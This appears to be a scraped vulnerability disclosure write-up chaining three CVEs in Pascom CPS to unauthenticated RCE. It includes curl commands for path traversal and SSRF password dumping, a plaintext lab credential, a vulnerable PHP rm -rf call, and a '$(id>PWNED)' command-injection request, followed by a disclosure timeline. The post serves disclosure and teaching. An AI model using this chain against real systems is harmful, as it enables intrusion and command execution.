The story of 3 bugs that lead to Unauthorized RCE — Pascom Systems

Introduction

Pascom CPS System Structure

Path traveseral in Nginx to Tomcat reverse proxy requests (CVE-2021–45968)

# From /etc/nginx/nginx.conf in `pascom-<hostname>` container
# Xmppserver proxy /services/pluginscript -> localhost:9090
location ^~ /services/pluginscript {
rewrite ^/services/pluginscript/(.*) /$1 break;
proxy_pass http://127.0.0.1:9090/plugins/mobydick/pluginscript/$1$is_args$query_string;
}

Outdated Openfire (XMPP server) jar causes SSRF (CVE-2021–45967)

  • Dump the password using path traversal + SSRF
  • Use the password to exploit the last bug (RCE)
# Dump the password
curl -k --path-as-is 'https://192.168.56.105/pascom-confirm/services/pluginscript/..;/..;/..;/getFavicon?host=localhost/services/sysinfo/activeconfig?' -o - 2>/dev/null| jq | grep moby
# Use the password to dump some stuff (Make sure we got the right one)
curl -vk -o - --path-as-is -u "moby:hYXanvhQaD70wOB" "https://192.168.56.105/pascom-confirm/services/sysinfo/activeconfig" -o - 2>/dev/null | grep password

Command Injection in the scheduled task (CVE-2021–45966)

class tsk050380 extends ex_task{    public function perform( $pars ){
if (count($pars) < 2 || count($pars) > 4) {
$this->logError('Wrong parameters');
return false;
}
// Parameter prüfen
$tarfile = $pars[0];
$targetdir=$pars[1];
if(count($pars) > 2)
$deleteOutDir = $pars[2];
else
$deleteOutDir = false;
if (count($pars) > 3)
$createOutDir = $pars[3];
else
$createOutDir = false;
if ($createOutDir && !is_dir($targetdir)) {
if (!mkdir($targetdir, 0777, true)) {
$this->logError("Failed to create output directory: $targetdir");
return false;
}
}
if (!is_dir($targetdir)) {
$this->logError("No such directory: $targetdir");
return false;
}
if (!is_file($tarfile)) {
$this->logError("No such file: $tarfile");
return false;
}
if($deleteOutDir) {
$this->logMessage('Clean output directory');
$ret = $this->execute('rm -rf ' . realpath($targetdir) . '/*'); // RCE, $targetDir is derived from user input and not cleaned.
if($ret !== 0) {
# RCE request
curl -k -o - --path-as-is -u "moby:hYXanvhQaD70wOB" "https://192.168.56.105/pascom-confirm/services/apply" -H 'Content-Type: application/json' -d '{"task":"050380","executor":"tsk", "args": ["/etc/passwd", "/tmp/MAD_DIR$(id>PWNED)","True","True"] }' 2>/dev/null | jq

RCE Demo

Timeline

  • Dec 29, 2021, → Initial contact with Pascom
  • Jan 3, 2022, → Sent vulnerability details
  • Jan 5, 2022, → Pascom prepare patches, and a grace peroid to disclosure is set
  • Mar 7, 2022 → Public disclosure.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
TutorialBoy

TutorialBoy

Our mission is to get you into information security. We'll introduce you to penetration testing and Red Teaming. We cover network testing, Active Directory.